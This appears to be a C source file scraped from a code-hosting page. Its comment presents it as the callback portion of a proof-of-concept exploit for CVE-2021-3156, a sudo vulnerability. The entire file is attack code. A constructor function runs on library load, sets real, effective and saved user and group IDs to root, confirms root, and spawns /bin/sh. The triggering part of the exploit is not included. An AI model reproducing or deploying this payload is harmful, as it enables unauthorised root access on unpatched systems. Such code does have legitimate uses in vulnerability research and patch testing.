33 lines
519 B
C
33 lines
519 B
C
/*
|
|
|
|
CVE-2021-3156 PoC
|
|
|
|
-- this is just the callback code --
|
|
|
|
*/
|
|
|
|
#define _GNU_SOURCE
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
#define EXECVE_SHELL_PATH "/bin/sh"
|
|
|
|
static void __attribute__ ((constructor)) pop_shell(void);
|
|
char *n[] = {NULL};
|
|
|
|
void pop_shell(void) {
|
|
printf("[+] callback executed!\n");
|
|
setresuid(0, 0, 0);
|
|
setresgid(0, 0, 0);
|
|
if(getuid() == 0) {
|
|
puts("[+] we are root!");
|
|
} else {
|
|
puts("[-] something went wrong!");
|
|
exit(0);
|
|
}
|
|
|
|
execve(EXECVE_SHELL_PATH, n, n);
|
|
|
|
}
|